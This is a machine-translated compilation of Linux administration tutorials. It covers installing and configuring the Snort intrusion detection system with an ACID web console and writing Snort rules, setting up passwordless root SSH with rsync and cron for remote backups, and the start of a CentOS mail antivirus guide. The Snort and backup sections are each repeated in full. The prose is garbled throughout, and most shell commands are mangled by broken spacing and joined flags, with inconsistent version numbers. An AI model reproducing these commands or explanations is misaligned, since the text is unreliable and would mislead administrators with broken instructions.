Host-based Intrusion Detection System Sensor can not direct access to information from the system, it is to do a good job through an agent prior procedures, installed on the host where the need to detect these agents the main collection system and network log files, directories and files do not expect a change in procedures do not expect the implementation of the act, the physical form of intrusion information.
Network-based Intrusion Detection System Sensor detection side are generally arranged in the core network switches, switch or exchange of the mirror port (to take the core of the Sensor switch on the device or the mirror port mirroring switch ports sector, mainly by the network the volume and the number of clients, as well as intrusion detection and network processing capability of the attack to set the frequency) of the machines in the network, Intrusion Detection System installed on the console, do the police deal with the server or in an important there is a need to install client agent to gather system and network logs and other system information to find the offensive characteristics of the packet. Technical personnel from the host and network test and monitoring information for analysis.
Snort is one of the most widely used IDS products, it has been positioned as a lightweight Intrusion Detection System, which has the following characteristics:
(1) It is a lightweight network intrusion detection system, the so-called lightweight means running the software only takes up very little when the network resources, the original network performance has little effect.
(2) from the data source view, it is a network-based intrusion detection software, that is, as a sniffer on the same network to a host of other traffic capture, and then analyzed.
(3) the use of its misuse detection model, that is, first of all to establish the characteristics of intrusions to cry, and then in the detection process, the collected data packets and compare the characteristics of the code r in order to arrive at the conclusion whether or not the invasion.
(4) c it is open source language network intrusion detection system. Its source code can be freely read, dissemination and revision of, any programmer can add features to its free to amend the error, any dissemination. This makes it able to improve and promote the rapid development of applications.
(5) It is a cross-platform software, supported by a very wide range of operating systems, such as windows, linux, sunos have support. Installed in the windows is relatively simple: First, download the windows under the network packet capture tools winpcap (www.winpcap.org), and then download the snort installation package, you can double-click the installation directly.
(6) Snort has three main modes: packet sniffer, packet logger, or intrusion detection systems mature.
Some of the features of Snort:
Real-time traffic analysis and packet records.
payload packaging inspection.
query protocol analysis and content matches.
detect buffer overflow, port scan secret, CGI attacks, SMB detection, operating system, the invasion attempt.
log on the system, the specified file, Unix socket or through the Samba for real-time alarm winpopus.
Snort can work in three kinds of model are as follows:
1) sniffer sniffer:
Command: snort-v [-d] [-X]
Snort use Libpcap packet capture library, that library use TCPDUMP. In this mode, Snort to use the promiscuous mode network interface to read and parse the network packet channel sharing. BPF expressions can be used to filter traffic.
-v verbose
-d Dump application layer data
-X began to dump from the link layer of the original package
2) packet log mode
Command: snort-l dir [-h hn] [-b]
This mode records in ASCII format for analysis of the division.
-l directory snort will log on in this directory
set-h X.X.X.X its local subnet
-b log format to use binary TCPDUMP
3) Intrusion Detection mode
Command: snort-c snort.conf [-l dir]
Rule base can be loaded into the intrusion detection model. That is,
#. / snort-c snort.conf
Add snort will report to the police information / var / log / snort directory, you can use-l option to change the directory.
When we use our intrusion detection mode, the rules must be included in the Treasury in order to detect, after loading the rule base, snort network data sets and pattern matching rules in order to detect possible intrusion attempts.
This article on the Linux platform (this is redhat 9.0) under the snort installation and configuration, the final configuration for a snort of web invasion ACID analysis console database. Environment in the Linux pre-installed by the need to build a supportive environment for a wide range of software in order to use snort. Table 1 lists the software and their role.
Table 1 to install the necessary software snort
The name of the role of the software download site
Aapche under the Apache http://httpd.apache.org/ Linux server
PHP http://php.net/ PHP scripting support
Database support for MySQL http://www.mysql.cn/
libpcap http://www.tcpdump.org/ network capture tools
Snort http://www.snort.org Windows installation package under the Snort
ACID http://www.cert.org/kb/acid Intrusion Detection PHP-based database analysis console
ADOdb http://adodb.sourceforge.net for PHP to provide a unified database connection function
JpGraph http://www.aditus.nu/jpgraph PHP graphics library used by
1. Zlib1.1.4 installation
Tar-xzvf zlib-xx.tar.gz
Cd zlib-xx
/ Configure;
Make install
Cd ..
2. LibPcap0.7.2 installation
tar-xzvf libpcap.tar.gz
cd libpcap-xx
/ configure
Make
make install
cd ..
3. MySQL4.0.12 installation
tar-xzvf mysql-xx.tar.gz
cd mysql-xx
/ configure - prefix = / usr / local / mysql
Make
make install
cd scripts
/ mysql_install_db
chown-R root / usr / local / mysql
chown-R mysql / usr / local / mysql / var
chgrp-R mysql / usr / local / mysql
cd. / support-files / my-medium.cnf / etc / my.cnf
To / etc / ld.so.conf to add two lines: / usr / local / mysql / lib / mysql
/ usr / local / lib
Load library, the implementation of
ldconfig-v
Test whether or not the work of mysql:
4. Apache2.0.45 and install PHP4.3.1
tar-zxvf httpd-2.0.xx.tar.gz
cd httpd_2.xx.xx
/ configure - prefix = / www - enable-so
Make
make install
cd ..
tar-zxvf php-4.3.x.tar.gz
cd php-4.3.x
/ configure - prefix = / www / php - with-apxs2 = / www / bin / apxs - with-config-filepath = / www / php - enable-sockets - with-mysql = / usr / local / mysql - with-zlibdir = /
usr / local - with-gd
cp php.ini-dist / www / php / php.ini
Edit httpd.conf (/ www / conf):
By adding two lines of
LoadModule php4_module modules/libphp4.so
AddType application / x-httpd-php. Php
relevant httpd.conf as follows:
#
# LoadModule foo_module modules / mod_foo.so
LoadModule php4_module modules/libphp4.so
# AddType allows you to tweak mime.types without actually editing it, or? $
# Make certain files to be certain types.
#
AddType application / x-tar. Tgz
AddType image/x- icon. Ico
AddType application / x-httpd-php. Php
To test Apache and PHP:
5. Snort2.0 installation
5.1 the establishment of snort configuration file and log directory
mkdir / etc / snort
mkdir / var / log / snort
tar-zxvf snort-2.x.x.tar.gz
cd snort-2.x.x
/ configure - with-mysql = / usr / local / mysql
Make
make install
5.2 installation rules and configuration files
cd rules (in the snort installation directory)
cp * / etc / snort
cd. / etc
cp snort.conf / etc / snort
cp *. config / etc / snort
5.3 modify snort.conf (/ etc / snort / snort.conf)
var HOME_NET 10.2.2.0/24
var RULE_PATH. / rules be amended as var RULE_PATH / etc / snort /
Database change log records:
output database: log, mysql, user = root password = your_password
dbname = snort host = localhost
5.4 set up for self-starting snort:
Snort installed in the directory
cd / contrib.
cp S99snort / etc / init.d / snort
vi / etc / init.d / snort
Snort modified as follows:
CONFIG = / etc / snort / snort.conf
# SNORT_GID = nogroup (commented out)
# 8194; $ SNORT_PATH / snort-c? $ CONFIG-i? $ IFACE? $ OPTIONS
Chmod 755 / etc / init.d / snort
cd / etc/rc3.d
ln-s / etc / init.d / snort S99snort
ln-s / etc / init.d / snort K99snort
cd / etc/rc5.d
ln-s / etc / init.d / snort S99snort
ln-s / etc / init.d / snort K99snort
6 in the mysql database to create a snort, the results are as follows:
7. ADOdb installation
cp adodb330.tgz / www / htdocs /
cd / www / htdocs
tar-xzvf adodb330.tgz
rm-rf adodb330.tgz
8. JgGraph installation
cp jpgraph-1.11.tar.gz / www / htdocs
cd / www / htdocs
tar-xzvf jpgraph-1.xx.tar.gz
rm-rf jpgrap-1.xx.tar.gz
cd jpgraph-1.11
rm-rf README
rm-rf QPL.txt
9. Installed the console configuration data ACID
cp acid-0.0.6b23.tar.gz / www / htdocs
cd / www / htdocs
tar-xvzf acid-0.9.6b23.tar.gz
rm-rf acid-0.9.6b23.tar.gz
cd / www / htodcs / acid /
Editor acid_conf.php, to amend the relevant configuration is as follows:
# 8194; $ DBlib_path = "/ www / htdocs / adodb";
# 8194; $ alert_dbname = "snort";
# 8194; $ alert_host = "localhost";
# 8194; $ alert_port = "";
# 8194; $ alert_user = "root";
# 8194; $ alert_password = "Your_Password";
/ * Archive DB connection parameters * /
# 8194; $ archive_dbname = "snort";
# 8194; $ archive_host = "localhost";
# 8194; $ archive_port = "";
# 8194; $ archive_user = "root";
# 8194; $ archive_password = "Your_Password";
And a little further down
# 8194; $ ChartLib_path = "/ www/htdocs/jpgraph-1.11/src";
/ * File format of charts ( 'png', 'jpeg', 'gif') * /
# 8194; $ chart_file_format = "png";
Into the web interface:
http://yourhost/acid/acid_main.php
Point "Setup Page" link -> Create Acid AG
ACID visit http://yourhost/acid will see the interface.
Snort Rules
Snort rule base is constantly updated, you can download www.snort.org to the latest snort rule base. snrot the use of a simple rule lightweight description language to describe the rules of its configuration information, it is flexible and powerful. Prior to version 1.8 in the snort rule must be written in a one-way, in the current version can be used '\' to be folding line.
Snort rules are divided into two logical parts: the rules and regulations the first option. Rules contained in the rules of the first action, agreements, source and destination ip address and network mask, as well as the source and destination port information; rule option section contains alert messages and to check the specific part of the package. The following is an example of a rule:
alert tcp any any -> 192.168.1.0/24 111 (content: "| 00 01 86 a5 |"; msg: "mountd access";)
Brackets before the first part of the rules, the part in brackets is the rule option. Options section of the rules of the word before the colon is called option keywords. Note: Not all rules are the rules must include the option of the option is only in order to want to collect or report to the police, or discarded by a more rigorous definition of package. Composed of all the elements of a rule for the specified action to be taken must be true. When the number of elements together, you think that they formed a logical and (AND) statements. At the same time, snort rules library file can be different rules that form a large logical or (OR) statement.
The following map is downloaded from the official website of http://www.snort.org the Community-Rules-2.4 in
mysql.rules part of the rules. We see one of them is as follows:
alert tcp $ EXTERNAL_NET any -> $ SQL_SERVERS 3306 (msg: "MYSQL root
login attempt "; flow: to_server, established; content:" | 0A 00 00 01 85 04 00 00
80 | root | 00 | "; classtype: protocol-command-decode; sid: 1775; rev: 2;)
It said that from the external network to any port visit to mysql server at port 3306, if the data stream
Matched to the content in 0A 00 00 01 85 04 00 00 80 root 00 (which indicates that 2-byte hexadecimal
Code), then report to the police in the record or "MYSQL root login attempt".
Snort rules of analysis, we can see that, in fact, in addition to snort rules ip address and port number, the most important thing is the contents of pattern matching, that is, content in the keyword content. Vulnerability we have to submit code and tools to be used in line with the snort format at the time of detection of the characteristics of the network, should attack code is characteristic of the field.
Rules, as well as through online information on the characteristics of the analysis, we found the characteristics of the field, run the attack code used ethreal or other sniffer tools to intercept data packets, and then decode the data package content, to analyze the characteristics of the field, and then to write snort rules . In the "principle of using Snort detected from the MS05-051 attack" a text, the author is given for how the MS05-051 vulnerability by attacking coding rules to detect attacks and steps. As can be seen from the text, is mainly used after ethreal intercepted data packets, extracting the main points of matching, and then use keywords to snort to write the rules, so that has been characteristic of the snort rules.
This paper describes the system under linux installation and configuration of snort and snort on the rules of the relevant knowledge base, as well as how to write our own rules in line with the snort database format, hope that we learn and understand snort helpful.
阅读全文...
Analysis of this information to see whether there is any breach of network security strategy and the signs of attack, which extends the system administrator's security management capabilities, improved information security and integrity of infrastructure. In general, IDS is added as a firewall, the IDS is generally behind a firewall, network activity can be detected in real time, and according to the circumstances and the prohibition of network activity records.
IDS Intrusion Detection System based on the focus of the work different, can be divided into host-based intrusion detection system and network-based intrusion detection system. Constitutes a general intrusion detection system is divided into two parts one part is part of detection (Sensor), part of the police to deal with the results of the console. Different composition of the intrusion detection in general is not the same as the console and the Sensor are two basic parts, host-based intrusion detection in most of the host agent is installed on a system to collect information to report to the Sensor.
Detection of Intrusion Detection System through its own sources of information are part of Sensor Detection received.
Network-based intrusion detection, mainly through the interception of network packet analysis to find offensive and undesirable characteristics of the data packet attempts. In network-based Intrusion Detection System Sensor part of the testing are generally arranged in a mirror-port switch (or a common arbitrary port HUB), flows through the network to listen to all packets, the packets to find matches to be invaded source of information.
Host-based Intrusion Detection System Sensor can not direct access to information from the system, it is to do a good job through an agent prior procedures, installed on the host where the need to detect these agents the main collection system and network log files, directories and files do not expect a change in procedures do not expect the implementation of the act, the physical form of intrusion information.
Network-based Intrusion Detection System Sensor detection side are generally arranged in the core network switches, switch or exchange of the mirror port (to take the core of the Sensor switch on the device or the mirror port mirroring switch ports sector, mainly by the network the volume and the number of clients, as well as intrusion detection and network processing capability of the attack to set the frequency) of the machines in the network, Intrusion Detection System installed on the console, do the police deal with the server or in an important there is a need to install client agent to gather system and network logs and other system information to find the offensive characteristics of the packet. Technical personnel from the host and network test and monitoring information for analysis.
Snort is one of the most widely used IDS products, it has been positioned as a lightweight Intrusion Detection System, which has the following characteristics:
(1) It is a lightweight network intrusion detection system, the so-called lightweight means running the software only takes up very little when the network resources, the original network performance has little effect.
(2) from the data source view, it is a network-based intrusion detection software, that is, as a sniffer on the same network to a host of other traffic capture, and then analyzed.
(3) the use of its misuse detection model, that is, first of all to establish the characteristics of intrusions to cry, and then in the detection process, the collected data packets and compare the characteristics of the code r in order to arrive at the conclusion whether or not the invasion.
(4) c it is open source language network intrusion detection system. Its source code can be freely read, dissemination and revision of, any programmer can add features to its free to amend the error, any dissemination. This makes it able to improve and promote the rapid development of applications.
(5) It is a cross-platform software, supported by a very wide range of operating systems, such as windows, linux, sunos have support. Installed in the windows is relatively simple: First, download the windows under the network packet capture tools winpcap (www.winpcap.org), and then download the snort installation package, you can double-click the installation directly.
(6) Snort has three main modes: packet sniffer, packet logger, or intrusion detection systems mature.
Some of the features of Snort:
Real-time traffic analysis and packet records.
payload packaging inspection.
query protocol analysis and content matches.
detect buffer overflow, port scan secret, CGI attacks, SMB detection, operating system, the invasion attempt.
log on the system, the specified file, Unix socket or through the Samba for real-time alarm winpopus.
Snort can work in three kinds of model are as follows:
1) sniffer sniffer:
Command: snort-v [-d] [-X]
Snort use Libpcap packet capture library, that library use TCPDUMP. In this mode, Snort to use the promiscuous mode network interface to read and parse the network packet channel sharing. BPF expressions can be used to filter traffic.
-v verbose
-d Dump application layer data
-X began to dump from the link layer of the original package
2) packet log mode
Command: snort-l dir [-h hn] [-b]
This mode records in ASCII format for analysis of the division.
-l directory snort will log on in this directory
set-h X.X.X.X its local subnet
-b log format to use binary TCPDUMP
3) Intrusion Detection mode
Command: snort-c snort.conf [-l dir]
Rule base can be loaded into the intrusion detection model. That is,
#. / snort-c snort.conf
Add snort will report to the police information / var / log / snort directory, you can use-l option to change the directory.
When we use our intrusion detection mode, the rules must be included in the Treasury in order to detect, after loading the rule base, snort network data sets and pattern matching rules in order to detect possible intrusion attempts.
This article on the Linux platform (this is redhat 9.0) under the snort installation and configuration, the final configuration for a snort of web invasion ACID analysis console database. Environment in the Linux pre-installed by the need to build a supportive environment for a wide range of software in order to use snort. Table 1 lists the software and their role.
Table 1 to install the necessary software snort
The name of the role of the software download site
Aapche under the Apache http://httpd.apache.org/ Linux server
PHP http://php.net/ PHP scripting support
Database support for MySQL http://www.mysql.cn/
libpcap http://www.tcpdump.org/ network capture tools
Snort http://www.snort.org Windows installation package under the Snort
ACID http://www.cert.org/kb/acid Intrusion Detection PHP-based database analysis console
ADOdb http://adodb.sourceforge.net for PHP to provide a unified database connection function
JpGraph http://www.aditus.nu/jpgraph PHP graphics library used by
1. Zlib1.1.4 installation
Tar-xzvf zlib-xx.tar.gz
Cd zlib-xx
/ Configure;
Make install
Cd ..
2. LibPcap0.7.2 installation
tar-xzvf libpcap.tar.gz
cd libpcap-xx
/ configure
Make
make install
cd ..
3. MySQL4.0.12 installation
tar-xzvf mysql-xx.tar.gz
cd mysql-xx
/ configure - prefix = / usr / local / mysql
Make
make install
cd scripts
/ mysql_install_db
chown-R root / usr / local / mysql
chown-R mysql / usr / local / mysql / var
chgrp-R mysql / usr / local / mysql
cd. / support-files / my-medium.cnf / etc / my.cnf
To / etc / ld.so.conf to add two lines: / usr / local / mysql / lib / mysql
/ usr / local / lib
Load library, the implementation of
ldconfig-v
Test whether or not the work of mysql:
4. Apache2.0.45 and install PHP4.3.1
tar-zxvf httpd-2.0.xx.tar.gz
cd httpd_2.xx.xx
/ configure - prefix = / www - enable-so
Make
make install
cd ..
tar-zxvf php-4.3.x.tar.gz
cd php-4.3.x
/ configure - prefix = / www / php - with-apxs2 = / www / bin / apxs - with-config-filepath = / www / php - enable-sockets - with-mysql = / usr / local / mysql - with-zlibdir = /
usr / local - with-gd
cp php.ini-dist / www / php / php.ini
Edit httpd.conf (/ www / conf):
By adding two lines of
LoadModule php4_module modules/libphp4.so
AddType application / x-httpd-php. Php
relevant httpd.conf as follows:
#
# LoadModule foo_module modules / mod_foo.so
LoadModule php4_module modules/libphp4.so
# AddType allows you to tweak mime.types without actually editing it, or? $
# Make certain files to be certain types.
#
AddType application / x-tar. Tgz
AddType image/x- icon. Ico
AddType application / x-httpd-php. Php
To test Apache and PHP:
5. Snort2.0 installation
5.1 the establishment of snort configuration file and log directory
mkdir / etc / snort
mkdir / var / log / snort
tar-zxvf snort-2.x.x.tar.gz
cd snort-2.x.x
/ configure - with-mysql = / usr / local / mysql
Make
make install
5.2 installation rules and configuration files
cd rules (in the snort installation directory)
cp * / etc / snort
cd. / etc
cp snort.conf / etc / snort
cp *. config / etc / snort
5.3 modify snort.conf (/ etc / snort / snort.conf)
var HOME_NET 10.2.2.0/24
var RULE_PATH. / rules be amended as var RULE_PATH / etc / snort /
Database change log records:
output database: log, mysql, user = root password = your_password
dbname = snort host = localhost
5.4 set up for self-starting snort:
Snort installed in the directory
cd / contrib.
cp S99snort / etc / init.d / snort
vi / etc / init.d / snort
Snort modified as follows:
CONFIG = / etc / snort / snort.conf
# SNORT_GID = nogroup (commented out)
# 8194; $ SNORT_PATH / snort-c? $ CONFIG-i? $ IFACE? $ OPTIONS
Chmod 755 / etc / init.d / snort
cd / etc/rc3.d
ln-s / etc / init.d / snort S99snort
ln-s / etc / init.d / snort K99snort
cd / etc/rc5.d
ln-s / etc / init.d / snort S99snort
ln-s / etc / init.d / snort K99snort
6 in the mysql database to create a snort, the results are as follows:
7. ADOdb installation
cp adodb330.tgz / www / htdocs /
cd / www / htdocs
tar-xzvf adodb330.tgz
rm-rf adodb330.tgz
8. JgGraph installation
cp jpgraph-1.11.tar.gz / www / htdocs
cd / www / htdocs
tar-xzvf jpgraph-1.xx.tar.gz
rm-rf jpgrap-1.xx.tar.gz
cd jpgraph-1.11
rm-rf README
rm-rf QPL.txt
9. Installed the console configuration data ACID
cp acid-0.0.6b23.tar.gz / www / htdocs
cd / www / htdocs
tar-xvzf acid-0.9.6b23.tar.gz
rm-rf acid-0.9.6b23.tar.gz
cd / www / htodcs / acid /
Editor acid_conf.php, to amend the relevant configuration is as follows:
# 8194; $ DBlib_path = "/ www / htdocs / adodb";
# 8194; $ alert_dbname = "snort";
# 8194; $ alert_host = "localhost";
# 8194; $ alert_port = "";
# 8194; $ alert_user = "root";
# 8194; $ alert_password = "Your_Password";
/ * Archive DB connection parameters * /
# 8194; $ archive_dbname = "snort";
# 8194; $ archive_host = "localhost";
# 8194; $ archive_port = "";
# 8194; $ archive_user = "root";
# 8194; $ archive_password = "Your_Password";
And a little further down
# 8194; $ ChartLib_path = "/ www/htdocs/jpgraph-1.11/src";
/ * File format of charts ( 'png', 'jpeg', 'gif') * /
# 8194; $ chart_file_format = "png";
Into the web interface:
http://yourhost/acid/acid_main.php
Point "Setup Page" link -> Create Acid AG
ACID visit http://yourhost/acid will see the interface.
Snort Rules
Snort rule base is constantly updated, you can download www.snort.org to the latest snort rule base. snrot the use of a simple rule lightweight description language to describe the rules of its configuration information, it is flexible and powerful. Prior to version 1.8 in the snort rule must be written in a one-way, in the current version can be used '\' to be folding line.
Snort rules are divided into two logical parts: the rules and regulations the first option. Rules contained in the rules of the first action, agreements, source and destination ip address and network mask, as well as the source and destination port information; rule option section contains alert messages and to check the specific part of the package. The following is an example of a rule:
alert tcp any any -> 192.168.1.0/24 111 (content: "| 00 01 86 a5 |"; msg: "mountd access";)
Brackets before the first part of the rules, the part in brackets is the rule option. Options section of the rules of the word before the colon is called option keywords. Note: Not all rules are the rules must include the option of the option is only in order to want to collect or report to the police, or discarded by a more rigorous definition of package. Composed of all the elements of a rule for the specified action to be taken must be true. When the number of elements together, you think that they formed a logical and (AND) statements. At the same time, snort rules library file can be different rules that form a large logical or (OR) statement.
The following map is downloaded from the official website of http://www.snort.org the Community-Rules-2.4 in
mysql.rules part of the rules. We see one of them is as follows:
alert tcp $ EXTERNAL_NET any -> $ SQL_SERVERS 3306 (msg: "MYSQL root
login attempt "; flow: to_server, established; content:" | 0A 00 00 01 85 04 00 00
80 | root | 00 | "; classtype: protocol-command-decode; sid: 1775; rev: 2;)
It said that from the external network to any port visit to mysql server at port 3306, if the data stream
Matched to the content in 0A 00 00 01 85 04 00 00 80 root 00 (which indicates that 2-byte hexadecimal
Code), then report to the police in the record or "MYSQL root login attempt".
Snort rules of analysis, we can see that, in fact, in addition to snort rules ip address and port number, the most important thing is the contents of pattern matching, that is, content in the keyword content. Vulnerability we have to submit code and tools to be used in line with the snort format at the time of detection of the characteristics of the network, should attack code is characteristic of the field.
Rules, as well as through online information on the characteristics of the analysis, we found the characteristics of the field, run the attack code used ethreal or other sniffer tools to intercept data packets, and then decode the data package content, to analyze the characteristics of the field, and then to write snort rules . In the "principle of using Snort detected from the MS05-051 attack" a text, the author is given for how the MS05-051 vulnerability by attacking coding rules to detect attacks and steps. As can be seen from the text, is mainly used after ethreal intercepted data packets, extracting the main points of matching, and then use keywords to snort to write the rules, so that has been characteristic of the snort rules.
This paper describes the system under linux installation and configuration of snort and snort on the rules of the relevant knowledge base, as well as how to write our own rules in line with the snort database format, hope that we learn and understand snort helpful.
阅读全文...
unix linux Rsync + SSH Server automated backup encryption
1. Preface
Since the 911 ... after the events in different places on the redundancy of the often heard people mention the name ... but is less to see the full discussion of this ... just because there is a need to ... have to study the way this thing ... take a look at how we are all in different places is redundant for the .. under a little bit of personal experience ...
This is divided into three parts ... one-way Trusted SSH Authorized ... Rsync ... Crontab .... Let us put aside the transfer speed for that ... as well as the time difference in different places ... Backup Solutions believe that such Most people should be able to satisfy the demand for it ...
II. Ready
Test System: Red Hat Linux 7.3 to Red Hat 7.3 ... Local side need to start Rsync ... package openssh-3.4p1-1
** Assumptions: A (10.0.0.1) to B (192.168.0.1) to do remote backup
PS: a clear role to the top ... of course you want to do down the line also ...
Reference Site: http://www.fanqiang.com/a6/b7/20010908/1305001258_b.Html
III. The beginning of implementation
1. The completion of a one-way Trusted SSH Authorized:
I would like to A (10.0.0.1) to B (192.168.0.1) to do remote backup ... so I use for A it SSH?
B to B do not need to enter a password when the ... ... User is the Root ... SSH Version2 version .. First of all, first in the A (10.0.0.1) have a public / private dsa key pair ..
[root @ mondeo home] # cd / root / .ssh /
[root @ mondeo. ssh] # ssh-keygen-d
Generating public / private dsa key pair.
Enter file in which to save the key (/ root / .ssh / id_dsa):
Enter passphrase (empty for no passphrase): <- here not to fight passphrase .. next time will not be asked passWord
Enter same passphrase again:
Your identification has been saved in / root / .ssh / id_dsa.
Your public key has been saved in / root / .ssh / id_dsa.pub.
The key fingerprint is:
11:22:33:44:55:66:77:88:99:00:11:22:33:44:55:66 root@mondeo.adj.idv.tw
[root @ mondeo. ssh] #
At this time the system will see two files now ... id_dsa and id_dsa.pub into the id_dsa.pub to 192.168.0.1 and changed its name to authorized_keys2
[root @ mondeo. ssh] # scp id_dsa.pub 192.168.0.1: / root/.ssh/authorized_keys2
root@192.168.0.1 's password:
id_dsa.pub 100% ********************************************* ****************
************** 612 00:00
[root @ mondeo. ssh] #
Now you can run ssh 192.168.0.1 to see if we can log in without having to enter a password ...
2. Use rsync to do Remote sync:
About rsync features:
rsync is a unix-like system backup of the data mirroring tools, from the name can be seen on the remote sync.
Its characteristics are as follows:
1, can save the whole image and the file system directory tree.
2, can be very easy to keep the original files, the time and so on.
3, there is no need to install special permissions.
4, optimization of processes, file transfer and high efficiency.
5, you can use rcp, ssh to transfer files, etc., of course, can also direct socket connection.
6, support for anonymous transmission.
First of all, first of the B (192.168.0.1) to the Server on up Rsync ...
[root @ linux /] # chkconfig - list rsync
rsync off
[root @ linux /] # chkconfig rsync on
Now, I in A (10.0.0.1) on the construction of a Backup Directory ... then B (192.168.0.1) with the mysql
html catalog backup done in different places ... even write a simple script as follows:
[root @ mondeo /] # mkdir backup
[root @ mondeo backup] # vi sync
rsync-avlR - delete-e ssh 192.168.0.1: / var / lib / mysql / backup / | | echo "rsync failed" | mail adminS@126.com
rsync-avlR - delete-e ssh 192.168.0.1: / var / www / html / backup /> / dev / null 2> & 1
[root @ mondeo backup] # chmod 700 sync
Parameters of significance are as follows:
-v: to tell rsync to carry out the details of the operation and explained how the ongoing operation of the system
-a: to tell rsync to copy the source directory of all files and directories.
-l, - links
When symlinks are encountered, recreate the symlink on the destination.
-R, - relative
Use relative paths. Retain the relative path ... it will not let parent subdirectory crowded with the same level ...
- delete
Server-side means that if a file is deleted, then the client corresponding to the deletion of the document, and maintain a genuine consensus.
-e ssh
To establish an encrypted connection.
Parameters varies from person to person ... you can use man rsync to use more parameters ...
Test to see:
[root @ mondeo backup] #. / sync
receiving file list ... done ... donewrote 16 bytes read 107 bytes 82.00
bytes / sectotal size is 0 speedup is 0.00receiving file list ...
done ... donewrote 16 bytes read 921 bytes 624.67 bytes / sectotal size is
308331 speedup is 329.06 [root @ mondeo backup] #
.... Did not ask for a password to see and copy the files over no problem Hello .... Of course, you can be a long-range changes in the data ... to see if you really sync ....
3. Crontab to make the use of automated scheduling:
After being set up now ... I hope the day ... 0:00 pm the night before to help me sync .... so of course, how long do you want to sync individual needs to see La ...
[root @ mondeo backup] # crontab-e
0 0 * * * / backup / sync
Set up a firewall:
SSH 22-port No.
iptables-A INPUT-i eth0-p tcp-s 10.1.1.0 / 24 - sport 1024:65535-d 192.168.0.1 - dport 22-j ACCEPT
port rsync 873
iptables-A INPUT i eth0-p tcp-s 10.1.1.0 / 24 - sport 1024:65535-d 192.168.0.1-dport 873-j ACCEPT
This is done .. the ... principle that you have automatically encrypted remote backup Hello
阅读全文...
Since the 911 ... after the events in different places on the redundancy of the often heard people mention the name ... but is less to see the full discussion of this ... just because there is a need to ... have to study the way this thing ... take a look at how we are all in different places is redundant for the .. under a little bit of personal experience ...
This is divided into three parts ... one-way Trusted SSH Authorized ... Rsync ... Crontab .... Let us put aside the transfer speed for that ... as well as the time difference in different places ... Backup Solutions believe that such Most people should be able to satisfy the demand for it ...
II. Ready
Test System: Red Hat Linux 7.3 to Red Hat 7.3 ... Local side need to start Rsync ... package openssh-3.4p1-1
** Assumptions: A (10.0.0.1) to B (192.168.0.1) to do remote backup
PS: a clear role to the top ... of course you want to do down the line also ...
Reference Site: http://www.fanqiang.com/a6/b7/20010908/1305001258_b.Html
III. The beginning of implementation
1. The completion of a one-way Trusted SSH Authorized:
I would like to A (10.0.0.1) to B (192.168.0.1) to do remote backup ... so I use for A it SSH?
B to B do not need to enter a password when the ... ... User is the Root ... SSH Version2 version .. First of all, first in the A (10.0.0.1) have a public / private dsa key pair ..
[root @ mondeo home] # cd / root / .ssh /
[root @ mondeo. ssh] # ssh-keygen-d
Generating public / private dsa key pair.
Enter file in which to save the key (/ root / .ssh / id_dsa):
Enter passphrase (empty for no passphrase): <- here not to fight passphrase .. next time will not be asked passWord
Enter same passphrase again:
Your identification has been saved in / root / .ssh / id_dsa.
Your public key has been saved in / root / .ssh / id_dsa.pub.
The key fingerprint is:
11:22:33:44:55:66:77:88:99:00:11:22:33:44:55:66 root@mondeo.adj.idv.tw
[root @ mondeo. ssh] #
At this time the system will see two files now ... id_dsa and id_dsa.pub into the id_dsa.pub to 192.168.0.1 and changed its name to authorized_keys2
[root @ mondeo. ssh] # scp id_dsa.pub 192.168.0.1: / root/.ssh/authorized_keys2
root@192.168.0.1 's password:
id_dsa.pub 100% ********************************************* ****************
************** 612 00:00
[root @ mondeo. ssh] #
Now you can run ssh 192.168.0.1 to see if we can log in without having to enter a password ...
2. Use rsync to do Remote sync:
About rsync features:
rsync is a unix-like system backup of the data mirroring tools, from the name can be seen on the remote sync.
Its characteristics are as follows:
1, can save the whole image and the file system directory tree.
2, can be very easy to keep the original files, the time and so on.
3, there is no need to install special permissions.
4, optimization of processes, file transfer and high efficiency.
5, you can use rcp, ssh to transfer files, etc., of course, can also direct socket connection.
6, support for anonymous transmission.
First of all, first of the B (192.168.0.1) to the Server on up Rsync ...
[root @ linux /] # chkconfig - list rsync
rsync off
[root @ linux /] # chkconfig rsync on
Now, I in A (10.0.0.1) on the construction of a Backup Directory ... then B (192.168.0.1) with the mysql
html catalog backup done in different places ... even write a simple script as follows:
[root @ mondeo /] # mkdir backup
[root @ mondeo backup] # vi sync
rsync-avlR - delete-e ssh 192.168.0.1: / var / lib / mysql / backup / | | echo "rsync failed" | mail adminS@126.com
rsync-avlR - delete-e ssh 192.168.0.1: / var / www / html / backup /> / dev / null 2> & 1
[root @ mondeo backup] # chmod 700 sync
Parameters of significance are as follows:
-v: to tell rsync to carry out the details of the operation and explained how the ongoing operation of the system
-a: to tell rsync to copy the source directory of all files and directories.
-l, - links
When symlinks are encountered, recreate the symlink on the destination.
-R, - relative
Use relative paths. Retain the relative path ... it will not let parent subdirectory crowded with the same level ...
- delete
Server-side means that if a file is deleted, then the client corresponding to the deletion of the document, and maintain a genuine consensus.
-e ssh
To establish an encrypted connection.
Parameters varies from person to person ... you can use man rsync to use more parameters ...
Test to see:
[root @ mondeo backup] #. / sync
receiving file list ... done ... donewrote 16 bytes read 107 bytes 82.00
bytes / sectotal size is 0 speedup is 0.00receiving file list ...
done ... donewrote 16 bytes read 921 bytes 624.67 bytes / sectotal size is
308331 speedup is 329.06 [root @ mondeo backup] #
.... Did not ask for a password to see and copy the files over no problem Hello .... Of course, you can be a long-range changes in the data ... to see if you really sync ....
3. Crontab to make the use of automated scheduling:
After being set up now ... I hope the day ... 0:00 pm the night before to help me sync .... so of course, how long do you want to sync individual needs to see La ...
[root @ mondeo backup] # crontab-e
0 0 * * * / backup / sync
Set up a firewall:
SSH 22-port No.
iptables-A INPUT-i eth0-p tcp-s 10.1.1.0 / 24 - sport 1024:65535-d 192.168.0.1 - dport 22-j ACCEPT
port rsync 873
iptables-A INPUT i eth0-p tcp-s 10.1.1.0 / 24 - sport 1024:65535-d 192.168.0.1-dport 873-j ACCEPT
This is done .. the ... principle that you have automatically encrypted remote backup Hello
阅读全文...
CentOS mail server with antivirus functionality SPAM
Can have a normal mail server MAIL, but its function less, and do not have anti-virus, anti-spam effectiveness. The realization of this mainly to add this feature! And added to the e-mail traffic monitoring capabilities!
1. Clamav anti-virus software installed;
[root @ mail ~] # yum install clamav
Dependencies Resolved
================================================== ===========================
Package Arch Version Repository Size
================================================== ===========================
Installing:
clamav i386 0.91.2-1.el4.rf dag 1.1 M
Installing for dependencies:
clamav-db i386 0.91.2-1.el4.rf dag 10 M
Transaction Summary
================================================== ===========================
Install 2 Package (s)
